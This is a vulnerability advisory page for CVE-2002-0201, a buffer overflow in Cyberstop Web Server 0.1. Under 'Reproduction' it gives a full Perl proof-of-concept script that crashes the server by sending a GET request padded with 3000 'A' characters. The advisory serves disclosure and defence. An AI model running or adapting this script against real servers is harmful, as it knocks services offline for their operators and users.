Unrated severityNVD Advisory· Published May 16, 2002· Updated Jun 16, 2026

CVE-2002-0201

Description

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

Cyberstop/Web Server
cpe:2.3:a:cyberstop:cyberstop_web_server:*:*:*:*:*:*:*:*
Cyberstop/Web Server for Windowsllm-create
Range: = 0.1

Patches

Vulnerability mechanics

Root cause

"A long HTTP GET request triggers a buffer overflow, leading to a denial of service or potential arbitrary code execution."

Attack vector

An attacker can send a crafted HTTP GET request containing an unusually large number of arbitrary characters to a vulnerable Cyberstop Web Server. This malformed request is designed to exceed the buffer allocated for handling requests, causing the server to crash and become unresponsive. The exploit script demonstrates sending a GET request with approximately 3000 'A' characters to trigger this condition [ref_id=1].

Affected code

The vulnerability resides within the HTTP request handling mechanism of Cyberstop Web Server for Windows version 0.1. Specifically, the server fails to properly validate the length of incoming HTTP GET requests, leading to a buffer overflow when processing excessively long requests [ref_id=1].

What the fix does

The advisory does not specify a patch or provide details on how the vulnerability is fixed. Remediation guidance suggests that users should update to a version of the software that addresses this issue, though no specific version is mentioned. Users are advised to consult vendor advisories for the most current information on available fixes.

Preconditions

inputThe server must receive an HTTP GET request.
inputThe HTTP GET request must contain an unusually large number of arbitrary characters.

Reproduction

```perl #!/usr/bin/perl # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # CyberStop WEbserver v0.1 proof-of-concept exploit # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Cyber_DoS.pl -s <server> # # Example: # # perl -x Cyber_DoS.pl -s 10.0.0.1 # # Crash was successful ! #

use Getopt::Std; use IO::Socket;

getopts('s:', \%args); if(!defined($args{s})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A"; $num = "3000"; $data .= $def x $num; $serv = $args{s}; $port = 80; $buf = "GET /$data /HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf";

print("\nCrash was successful !\n\n");

sub usage { die("\n\nUsage: perl -x $0 -s <server>\n\n"); }

``` [ref_id=1]

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

www.iss.net/security_center/static/7960.phpnvdVendor Advisory
marc.infonvd
www.securityfocus.com/bid/3930nvd

News mentions

No linked articles in our index yet.

cvss	0.000
epss	0.017
exploit	0.030
kev	0.000
patch	0.000
ransomware	0.000